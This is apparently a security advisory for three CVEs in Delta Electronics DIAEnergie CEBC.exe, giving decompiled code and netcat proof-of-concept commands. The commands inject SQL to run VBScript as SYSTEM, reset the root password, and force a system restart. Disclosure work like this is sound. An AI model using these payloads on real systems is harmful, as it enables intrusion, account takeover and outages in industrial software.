Multiple vulnerabilities exist in Delta Electronics DIAEnergie CEBC.exe v1.10.1.8610.
CVE-2024-4547 - RecalculateScript Unauthenticated SQLi (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CEBC.exe listens on TCP port 928 and accepts and processes remote messages sent to that port.
An SQLi vulnerability exists when CEBC.exe processes a 'RecalculateScript' message, which is split into 4 fields using the '~' character as the separator. An unauthenticated remote attacker can perform SQLi via the fourth field:
[...]
if (@string.StartsWith("RecalculateScript"))
{
string[] array7 = @string.Split(new char[] { '~' });
if (array7.Length != 4)
{
string text21 = "Command Error!" + DateTime.Now.ToString();
byte[] bytes25 = Encoding.ASCII.GetBytes(text21);
this.socket_1.Send(bytes25, bytes25.Length, SocketFlags.None);
goto IL_F0C;
}
try
{
RecalculateScriptClass recalculateScriptClass = new RecalculateScriptClass();
recalculateScriptClass.timeStart = Convert.ToDateTime(array7[1]);
recalculateScriptClass.timeEnd = Convert.ToDateTime(array7[2]);
recalculateScriptClass.tidList = array7[3].Split(new char[] { ',' });
diaenergieSQLHandleClass.ExcuteSQL("UPDATE DIAE_tag SET recalculate=2 WHERE tid IN (" + array7[3] + ")");
new Thread(new ThreadStart(recalculateScriptClass.RecalculateScript))
{
IsBackground = true
}.Start();
[...]
PoC:
// 1. Insert VBScript code into the DIAE_script table and execute it as SYSTEM
// Use a different script name for more insertions
echo -n "RecalculateScript~2024-01-01 00:00:00~2024-01-02 00:00:00~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'run_cmd', N'CreateObject(\"WScript.shell\").run(\"notepad.exe\")', N'1', N'');--" | nc <target-host> 928
// 2. Change DIAEnergie root password to 'password123' (without quotes)
echo -n "RecalculateScript~2024-01-01 00:00:00~2024-01-02 00:00:00~1); UPDATE DIAEnergie.dbo.DIAE_us SET pw=N'exJ/3E15SkSjem/EOj/JubyAEzX5F5zrBVKdPff2C9I=' WHERE uid=1;--" | nc <target-host> 928
CVE-2024-4548 - RecalculateHDMWYC Unauthenticated SQLi (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
An SQLi vulnerability exists when CEBC.exe processes a 'RecalculateHDMWYC' message, which is split into 4 fields using the '~' character as the separator. An unauthenticated remote attacker can perform SQLi via the fourth field:
[...]
if (@string.StartsWith("RecalculateHDMWYC"))
{
string[] array4 = @string.Split(new char[] { '~' });
if (array4.Length != 4)
{
string text14 = "Command Error!" + DateTime.Now.ToString();
byte[] bytes19 = Encoding.ASCII.GetBytes(text14);
this.socket_1.Send(bytes19, bytes19.Length, SocketFlags.None);
goto IL_F0C;
}
try
{
Class8 @class = new Class8();
@class.dataTable_0 = diaenergieSQLHandleClass.GetDataTable("SELECT t.sc,u.en,t.tid,t.it,t.reg,t.tp,t.su,t.tbid FROM DIAE_tag AS t LEFT JOIN DIAE_un AS u ON t.un=u.unm WHERE t.del='0' AND t.re='1'", new string[0]);
@class.method_1(Convert.ToDateTime(array4[1]), Convert.ToDateTime(array4[2]), array4[3].Split(new char[]
[...]
// method of Class8
public void method_1(DateTime dateTime_1, DateTime dateTime_2, string[] string_0, bool bool_0 = false)
{
DIAEnergieSQLHandleClass diaenergieSQLHandleClass = new DIAEnergieSQLHandleClass(Define.localhostSQLClientConnectString);
Stopwatch stopwatch = new Stopwatch();
stopwatch.Restart();
try
{
Class8.logger_0.Debug<string, string, string>("Start RecalculateHDMWYC timeStart:{0} timeEnd:{1} tidList:{2}", dateTime_1.ToString("yyyy-MM-dd HH:mm:ss"), dateTime_2.ToString("yyyy-MM-dd HH:mm:ss"), string.Join(",", string_0));
DataTable dataTable = diaenergieSQLHandleClass.GetDataTable("SELECT * FROM DIAE_shift", new string[0]);
DataTable dataTable2 = diaenergieSQLHandleClass.GetDataTable("SELECT TOP 0 kid,ts,tid,result FROM DIAE_data", new string[0]).Clone();
DataTable dataTable3 = diaenergieSQLHandleClass.GetDataTable("SELECT ts,tid,result FROM DIAE_data WHERE ts>='{0}' AND ts<='{1}' AND tid IN ({2})", new string[]
{
dateTime_1.ToString("yyyy-MM-dd HH:mm:00"),
dateTime_2.AddMinutes((double)Define.RecordIdleMinutes).ToString("yyyy-MM-dd HH:mm:00"),
string.Join(",", string_0)
});
[...]
PoC:
// 1.a Insert VBScript code into the DIAE_script table
// Use a different script name for more insertions
echo -n "RecalculateHDMWYC~2024-01-01 00:00:00~2024-01-02 00:00:00~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'run_cmd', N'CreateObject(\"WScript.shell\").run(\"notepad.exe\")', N'1', N'');--" | nc 172.26.30.103 928
// 1.b Execute the VBScript code as SYSTEM
echo -n "RecalculateScript~2024-01-01 00:00:00~2024-01-02 00:00:00~1" | nc <target-host> 928
// 2. Change DIAEnergie root password to 'attacker' (without quotes)
echo -n "RecalculateHDMWYC~2024-01-01 00:00:00~2024-01-02 00:00:00~1); UPDATE DIAEnergie.dbo.DIAE_us SET pw=N'uV5SW+n71LS/S/Bjd426N1hNF1r70booEbICe8yhAxc=' WHERE uid=1;--" | nc <target-host> 928
CVE-2024-4549 - Unauthenticated DoS (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)
When processing an 'ICS Restart!' message, CEBC.exe restarts the system:
[...]
else if (@string == "ICS Restart!")
{
Process.Start(new ProcessStartInfo
{
FileName = "shutdown.exe",
Arguments = "-r -t 1"
});
[...]
PoC:
echo -n 'ICS Restart!' | nc <target-host> 928